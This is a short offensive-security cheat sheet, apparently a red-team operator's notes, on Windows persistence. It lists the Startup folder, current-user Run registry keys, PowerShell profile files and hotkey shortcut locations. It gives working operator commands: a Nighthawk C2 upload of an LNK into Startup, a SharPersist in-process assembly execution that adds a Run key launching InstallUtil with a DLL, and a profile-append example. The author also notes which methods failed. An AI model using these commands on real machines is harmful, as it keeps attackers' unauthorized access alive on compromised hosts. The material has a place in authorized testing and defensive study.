Windows Persistence Methods and Locations
Current user’s Startup folder:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartupDeploying with Nighthawk:
upload C:\temp\persist\startup\StartUp.lnk "C:\\Users\\<USERNAME>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\StartUp.lnk"
Registry keys that launch on login - current user writable:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Adding this key with SharPersist and Nighthawk:
- BE SURE YOU ESCAPE ALL THE BACKSLASHES!!
- ⚡ Persisting with SharPersist as shown below didn’t work when I tried it. Not sure why. May need more testing.
- We also didn’t get SCHTASKS persistence working with SharPersist on the same project. Maybe a SharPersist problem?
inproc-execute-assembly --no-amsi-patch --no-etw-patch c:\pipe\SharPersist.exe -t reg -c "%SYSTEMROOT%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe" -a "/logfile= /u c:\\temp\\persist\\reg\\persist-10.dll" -k "hkcurun" -v "BHIS" -m add
PowerShell profile - runs every time PowerShell.exe runs:
%USERPROFILE%\Documents\WindowsPowerShell\Profile.ps1- THIS FOLDER NEEDS TO BE CREATED IF IT DOESN’T ALREADY EXIST
Example:
md %USERPROFILE%\Documents\WindowsPowerShell
echo echo 'Hello World!' >> %USERPROFILE%\Documents\WindowsPowerShell\Profile.ps1PowerShell ISE profile - runs every time PowerShell ISE is run:
%USERPROFILE%\Documents\WindowsPowerShell\Microsoft.PowerShellISE_profile.ps1
Hotkey - Upload a shortcut (LNK) with a hotkey to this location:
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\Alternate path with the same effect:
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\